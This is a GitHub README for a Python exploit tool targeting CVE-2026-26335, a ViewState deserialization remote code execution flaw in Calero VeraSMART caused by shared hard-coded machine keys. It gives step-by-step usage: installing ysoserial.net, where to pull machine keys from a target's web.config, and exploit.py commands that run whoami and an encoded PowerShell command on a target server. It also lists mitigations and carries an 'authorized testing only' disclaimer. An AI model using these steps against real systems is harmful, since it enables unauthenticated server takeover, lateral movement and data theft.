## 👤 Author

**Mohammed Idrees Banyamer**
Security Researcher

* GitHub: [https://github.com/mbanyamer](https://github.com/mbanyamer)
* Instagram: [https://instagram.com/banyamer_security](https://instagram.com/banyamer_security)


---

# CVE-2026-26335 - Calero VeraSMART ViewState RCE Exploit

![CVE](https://img.shields.io/badge/CVE-2026--26335-red)
![Severity](https://img.shields.io/badge/Severity-Critical-ff0000)
![CVSS](https://img.shields.io/badge/CVSS-9.8-critical)
![Platform](https://img.shields.io/badge/Platform-Windows-blue)
![ASP.NET](https://img.shields.io/badge/ASP.NET-ViewState-orange)
![Python](https://img.shields.io/badge/Python-3.x-blue)
![License](https://img.shields.io/badge/License-Educational-lightgrey)
![Author](https://img.shields.io/badge/Author-Banyamer-black)

---

## 📌 Description

**CVE‑2026‑26335** is a critical unauthenticated remote code execution vulnerability in **Calero VeraSMART** (pre‑2022 R1).

The application uses **static hard‑coded ASP.NET machine keys** shared across installations.  
An attacker with these keys can forge a malicious ASP.NET ViewState and trigger **server‑side deserialization → RCE**.

This exploit automates:

- ViewState endpoint discovery
- `__VIEWSTATEGENERATOR` extraction
- ysoserial payload generation
- Signed ViewState delivery
- Command execution

---

## ⚠️ Impact

- Unauthenticated RCE
- IIS user compromise
- Domain lateral movement
- Data exfiltration
- Persistence via webshell

---

## 🧠 Root Cause

**CWE‑321 — Hard‑coded cryptographic keys**

VeraSMART deployments reuse identical ASP.NET machineKey:

```xml
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />
````

Any attacker with keys from one installation can attack all.

---

## 🛠 Requirements

* Python 3
* ysoserial.net
* VeraSMART machine keys
* Network access to IIS

---

## ⚙️ Installation

```bash
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
```

---

## 🔑 Obtaining Machine Keys

Keys are **not public**. Obtain from target:

```bash
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
```

Or via companion file‑read:

**CVE‑2026‑26333**

---

## 🚀 Usage

### Check vulnerability

```bash
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
```

### Execute command

```bash
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
```

### Specific endpoint

```bash
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
```

### Proxy debugging

```bash
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
```

---

## 📡 Exploitation Flow

1. Find ViewState endpoint
2. Extract generator
3. Generate signed payload
4. Send forged ViewState
5. ASP.NET deserialization
6. Command execution

---

## 📊 CVSS

**9.8 — Critical**
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

---

## 🧪 Tested On

* VeraSMART 2020
* VeraSMART 2021
* VeraSMART 2022 (pre‑R1)
* Windows Server 2016/2019
* IIS 10
* ASP.NET 4.x

---

## 🔒 Mitigation

Fixed in VeraSMART 2022 R1:

* Unique machine keys
* ViewState hardening
* Secure key storage

Workarounds:

* Rotate machineKey
* Disable ViewState
* Restrict IIS exposure
* WAF ViewState rules

---

## 📚 References

* [https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce](https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce)
* [https://www.calero.com/](https://www.calero.com/)

---

## ⚖️ Disclaimer

Educational and authorized testing only.
Use only on systems you own or have permission to assess.

---

## 👤 Author

**Mohammed Idrees Banyamer**
Security Researcher

* GitHub: [https://github.com/mbanyamer](https://github.com/mbanyamer)
* Instagram: [https://instagram.com/banyamer_security](https://instagram.com/banyamer_security)

---
## 📊 Exploit Diagram

The following diagram illustrates the exploitation chain of **CVE‑2026‑26335** in Calero VeraSMART, where static ASP.NET machine keys allow forging a malicious ViewState leading to remote code execution.

```mermaid
flowchart LR
    A[Attacker] --> B[Obtain VeraSMART machineKey]
    B --> C[Discover ViewState endpoint]
    C --> D[Extract __VIEWSTATEGENERATOR]
    D --> E[Generate malicious ViewState via ysoserial]
    E --> F[Sign payload with machineKey]
    F --> G[Send forged POST request]
    G --> H[ASP.NET ViewState deserialization]
    H --> I[TypeConfuseDelegate gadget]
    I --> J[Remote Code Execution on IIS]


